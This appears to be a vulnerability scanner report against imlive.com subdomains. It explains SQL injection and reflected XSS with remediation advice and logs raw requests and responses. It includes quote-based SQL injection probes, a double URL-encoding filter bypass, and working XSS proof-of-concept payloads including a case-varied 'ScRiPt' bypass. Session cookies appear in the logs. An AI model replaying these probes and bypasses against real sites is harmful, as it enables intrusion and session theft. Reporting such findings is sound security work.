SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 8336 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8237 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8230 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 8249 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:34 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:35 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:28 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:48 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:31:40 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 8250 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ar.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||94ad3"><script>alert(1)</script>4f479a42c47~1');return false;"> ...[SNIP]...
2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ar.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26eb"><script>alert(1)</script>f467ed2684e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b26eb"><script>alert(1)</script>f467ed2684e=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/ X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 16:44:27 GMT Connection: close Content-Length: 21363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?b26eb"><script>alert(1)</script>f467ed2684e=1');return false;"> ...[SNIP]...
2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ar.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3ce'-alert(1)-'6c601d061a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ar.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
